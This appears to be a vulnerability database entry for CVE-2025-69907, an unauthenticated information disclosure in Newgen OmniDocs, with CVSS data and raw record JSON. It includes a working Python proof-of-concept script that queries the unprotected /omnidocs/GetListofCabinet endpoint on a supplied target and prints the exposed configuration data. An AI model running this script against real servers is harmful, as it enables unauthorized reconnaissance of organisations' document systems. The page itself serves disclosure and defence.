Security Vulnerability Report
中文
CVE-2025-69907 CVSS 7.5 HIGH

CVE-2025-69907

Published: 2026-01-23 15:16:05
Last Modified: 2026-04-15 00:35:42

Description

An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials to retrieve sensitive internal configuration information, including cabinet names and database-related metadata. This allows unauthorized enumeration of backend deployment details and may facilitate further targeted attacks.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Newgen OmniDocs < 最新安全更新版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69907 PoC - Newgen OmniDocs Unauthenticated Information Disclosure Discovered by: [email protected] CVSS 3.1: 7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N """ import requests import sys import json def exploit_cve_2025_69907(target_url): """ Exploit for CVE-2025-69907 Missing authentication on /omnidocs/GetListofCabinet endpoint """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-69907...") # Target endpoint that lacks authentication endpoint = "/omnidocs/GetListofCabinet" url = target_url.rstrip('/') + endpoint headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/html, */*', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close' } try: # Send unauthenticated request to vulnerable endpoint print(f"[*] Sending request to: {url}") response = requests.get(url, headers=headers, timeout=30, verify=False) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Headers: {dict(response.headers)}") if response.status_code == 200: print("[+] SUCCESS: Endpoint is accessible without authentication!") print("\n[+] Response Content:") try: # Try to parse as JSON data = response.json() print(json.dumps(data, indent=2)) except: # Print as text if not JSON print(response.text[:2000]) # Extract sensitive information print("\n[!] Sensitive Information Retrieved:") print(" - Cabinet names (document storage units)") print(" - Database metadata") print(" - System configuration details") return True else: print(f"[-] Failed: Status code {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} https://vulnerable-server.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_69907(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69907", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:05.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials to retrieve sensitive internal configuration information, including cabinet names and database-related metadata. This allows unauthorized enumeration of backend deployment details and may facilitate further targeted attacks."}, {"lang": "es", "value": "Existe una vulnerabilidad de revelación de información no autenticada en Newgen OmniDocs debido a la falta de autenticación y control de acceso en el endpoint de la API /omnidocs/GetListofCabinet. Un atacante remoto puede acceder a este endpoint sin credenciales válidas para recuperar información de configuración interna sensible, incluyendo nombres de gabinetes y metadatos relacionados con la base de datos. Esto permite la enumeración no autorizada de detalles de despliegue del backend y puede facilitar ataques dirigidos adicionales."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69907.md", "source": "[email protected]"}, {"url": "https://newgensoft.com/", "source": "[email protected]"}, {"url": "https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69907.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}